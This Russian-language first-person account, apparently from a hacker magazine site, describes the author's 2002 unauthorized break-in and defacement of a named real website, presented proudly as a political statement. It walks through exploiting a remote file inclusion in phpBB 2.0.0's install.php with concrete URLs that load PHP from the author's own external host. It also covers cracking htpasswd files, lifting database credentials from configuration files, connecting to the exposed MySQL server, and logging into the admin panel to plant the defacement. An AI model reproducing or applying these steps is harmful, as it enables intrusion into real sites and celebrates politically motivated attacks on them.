[НАЧАЛО]

26 октября 2002. Вечер. 

Пройдясь по известным мне
сайтам, я остановился
на сайте www.islam.ru.
Наверно я его выбрал потому, что в домене ru,
и его еще никто не ломал :). Полазил,
посмотрел что к чему, и сделал вывод — весь
сайт работает на PHP, пока будем работать с Web-интерфейсом,
демоны позже. С грустью посмотрел на XSpider’а —
не запустил.

Далее составил примерный список всех
скриптов (по названиям), и начал искать их в
Инете. Поисковики столько инфы выплеснули,
причем весьма отдаленной от тематики —
разгребать этот мусор не было времени — надо
делать взлом пока он актуален.

Зашел в форум — обычный, типа UBB, прокручиваю
пейдж — вижу надпись PhpBB 2.0.0. Дас — ну что
проверим?

[BUG] 

Explorer: В http://www.securityfocus.com
пишем PhpBB 2.0.0.

Одна ссылка,
заходим. Говорили мне учить английский, но
кое-как я понял, что есть в этом форуме
скрипт install.php, который подгружает и
исполняет файл functions_selects.php из указанной
директории.

Explorer: http://www.islam.ru/phorum/install.php?phpbb_root_dir=/ 

Он мне отвечает "Cannot find /wwwroot/islam/phorum/includes/functions_selects.php".
Ага! Вот оно как работает, далее почитав
БагТрак понял, что можно подгружать с
других серверов:

http://www.islam.ru/phorum/install.php?phpbb_root_dir=http://www.MYSITE.ru/

Заходим на Narod.ru, быстренько регистрируем
сайт http://install2.narod.ru
(кстати, там и миррор дефейса). Создаем на
народе файл functions_selects.php. 

<? Print ("hello\n"); ?> 

Explorer: http://www.islam.ru/phorum/install.php?m=http://install2.narod.ru/ 

Ответ: "Cannot find http://install2.narod.ru/includes/functions_selects.php". 
Ааа. Понял — бегом на Народ. Создаем
директорию includes, туда пихаем файл.

Опять пробуем. Ответ: "hello". Уже хорошо.
Теперь надо проверить, что мы можем. Не буду
приводить исходники скрипта, просто опишу
действия. 

<? 
//просмотр директории 
//просмотр файла 
//запись файла 
//исполнение команды 
?> 

Ошибка. Недостаточно прав на запись и
исполнение, а просматривать файлы,
директории могу. Значит дефейс будет
сделать труднее. Потихоньку начинаю
скачивать все файлы с сервера. Одновременно
с этим нашел файлы типа htpasswd. John The Ripper начал
работу. Лег спать. 

[День ¦2.] 

Проснувшись и покушав, включил телевизор,
положение не улучшилось. "Помочь" на
Дубровке я не мог, а вот тут у меня шансы
были-. 

JTR дал 0%. Начал изучать исходники и иерархию
директорий. Сразу кинулась в глаза
директория admin. Зашел на www.islam.ru/admin — что-то
типа "Удаленное управление 3.1.9". А где
пароль храниться? Открыл /admin/index.php — пароль
сравнивается с строкой из базы данных (mysql),
скрипт оперирует какими-то переменными $DB,
$DB_SERVER, $DB_LOGIN,$DB_PASSWORD. Посмотрел в начале, а
там загружаемый модуль. Открываю этот
модуль. Есть Логин, Пароль, База Данных, MySQL
сервер.

Мое предположение: работа с MySQL возможна
только с правами Web-сервера (я бы так сделал).
Значит будем через Баг впихивать скрипт для
работы с MySQL, и выводить на экран все, что
вязано с WHEREIS id=0.Сколько я мучился отлаживая
этот скрипт не передать словами, но никак не
хотел он присоединяться к серваку, то одна,
то другая ошибка. Решил оставить муторное
дело.

Вариант второй. Понадеялся на недочет в
системе безопасности (с любого ip можно
подключаться к MySQL серверу). Странно, очень
долго искал клиент, а потом просто набрал в
броузере www.mysql.ru
и опа, такой классный и под винды. Запустил,
ввел данные, 10 секунд ожидания и таблицы,
таблицы и данные, данные :).

В /admin/index.php смотрю из какой таблицы берутся
пароли, открываю ее и пароль есть, логин
есть. 

Explorer: www.islam.ru/admin — ввожу логин/пароль.
Передо мной очень много всего, похоже на
автоматическое добавление новостей, но с
расширенными функциями, работает со всеми
страницами сайта. Кликаю на Главную.

Несколько полей ввода: Титл страницы, файл
шапки, Тело, файл ботинок 🙂 ну и т.д. Тело
редактировать — проблем нет, но вот с
файлами шапки и ботинок проблемы были. Если
не правильный файл ввести, вылетала ошибка.
Ну какой дефейс с ошибкой и без тегов :).
Значит единственный результат, задать в
этих полях или пустые файлы, или файлы
которые ничего не отображают. Скоро был
найден такой файл, там были счетчики, против
них ничего плохого не имею. Залил дефейс.

[Послесловие] 

На следующий день получил 20 писем,
содержанием от "%#$!$% на ;%¦" до "МОЛОДЦЫ
РЕБЯТА! ТАК ДЕРЖАТЬ!". Так же было письмо
от админа. Предлагал телефон оставить —
наивный. Кстати, админ долго не мог понять,
что у меня пассворд есть, он убил форум. Но я
ему сказал, все исправил, и вроде все там ОК.

Результат. Я удовлетворен, конечно это мало
кому тогда было интересно, но для меня это
было важно. Я высказал свое мнение и позицию
по данной проблеме.

P.S. Чуть не забыл, огромный привет LJ и
компании c канала #xakep (irc.dal.net.ru).

WingGod
Rootteam http://www.sysworld.net

Оставить мнение

Check Also

Страдания с ReactOS. Почему в заменителе Windows работают трояны, но не работает Word

Сегодня в нашей кунсткамере демонстрируется необычайный организм — двадцатилетний зародыш …